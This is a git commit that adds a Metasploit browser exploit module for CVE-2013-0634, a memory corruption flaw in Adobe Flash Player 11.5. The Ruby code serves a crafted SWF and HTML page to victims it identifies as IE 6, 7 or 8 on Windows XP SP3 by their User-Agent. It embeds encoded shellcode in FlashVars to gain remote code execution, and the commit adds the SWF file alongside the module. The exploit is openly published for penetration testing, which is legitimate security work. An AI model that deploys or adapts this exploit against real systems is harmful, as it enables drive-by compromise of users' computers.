Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption

2014-01-18 11:07:11 -05:00 · 2014-01-18 11:07:11 -05:00 · 766c408d86
parent b43a221959
commit 766c408d86
2 changed files with 157 additions and 0 deletions
--- a/data/exploits/CVE-2013-0634/Main.swf
+++ b/data/exploits/CVE-2013-0634/Main.swf
--- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Adobe Flash Player 11.5 Remote Memory Corruption",
+      'Description'    => %q{
+         This module exploits a vulnerability found in the ActiveX component of Adobe
+        Flash Player before 11.5.502.149. By supplying a specially crafted swf file
+        with special regex value, it is possible to trigger an
+        memory corruption, which results in remote code execution under the context of the
+        user. This vulnerability has also been exploited in the wild in February 2013.
+        Please note in order to ensure reliability, the exploit is forced to modify 
+        your URIPATH parameter to less than 3 characters, which may cause possible
+        URIPATH collisions.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # malware sample
+          'Boris "dukeBarman" Ryutin' # msf exploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-0634' ],
+          [ 'OSVDB', '89936'],
+          [ 'BID', '57787'],
+          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
+          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
+          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
+          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
+          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 1024
+        },
+      'DefaultOptions'  =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'EXITFUNC'             => 'thread',
+          'HTTP::compression'    => 'gzip',
+          'HTTP::chunked'        => true,
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'IE 6 on Windows XP SP3',    {'Rop' => nil } ],
+          [ 'IE 7 on Windows XP SP3',    {'Rop' => nil } ],
+          [ 'IE 8 on Windows XP SP3',    {'Rop' => nil } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 8 2013",
+      'DefaultTarget'  => 0))
+  end
+
+  def get_payload(t)
+    p = payload.encoded
+    return p
+  end
+
+  def get_target(agent)
+    #If the user is already specified by the user, we'll just use that
+    return target if target.name != 'Automatic'
+
+    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+      return targets[1]  #IE 6 on Windows XP SP3
+
+    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+      return targets[2]  #IE 7 on Windows XP SP3
+
+    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+      return targets[3]  #IE 8 on Windows XP SP3
+
+    else
+      return nil
+    end
+
+  end
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    my_target = get_target(agent)
+
+    # Avoid the attack if the victim doesn't have the same setup we're targeting
+    if my_target.nil?
+      print_error("Browser not supported: #{agent}")
+      send_not_found(cli)
+      return
+    end
+
+    print_status("Target selected: #{my_target.name}")
+    print_status("Client requesting: #{request.uri}")
+
+    swf_uri = "/#{@resource_name}.swf"
+    shellcode = get_payload(my_target).unpack("H*")[0]
+
+    # The SWF request itself
+    if request.uri =~ /\.swf$/
+      print_status("Sending SWF")
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
+      return
+    end
+
+    html = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="#{swf_uri}" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="his=#{shellcode}" />
+    <param name="Play" value="true" />
+    </object>
+    </body>
+    </html>
+    |
+
+    html = html.gsub(/^ {4}/, '')
+    print_status("Sending HTML")
+    send_response(cli, html, {'Content-Type'=>'text/html'})
+  end
+
+  def primer
+    hardcoded_uripath("/#{@resource_name}.swf")
+  end
+
+  def exploit
+    @swf = create_swf
+    @resource_name = Rex::Text.rand_text_alpha(5)
+    vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")
+
+    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
+    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
+    datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3
+    print_warning("URIPATH set to #{datastore['URIPATH']}")
+    super
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "Main.swf" )
+    fd = ::File.open( path, "rb" )
+    swf = fd.read(fd.stat.size)
+    fd.close
+    return swf
+  end
+
+end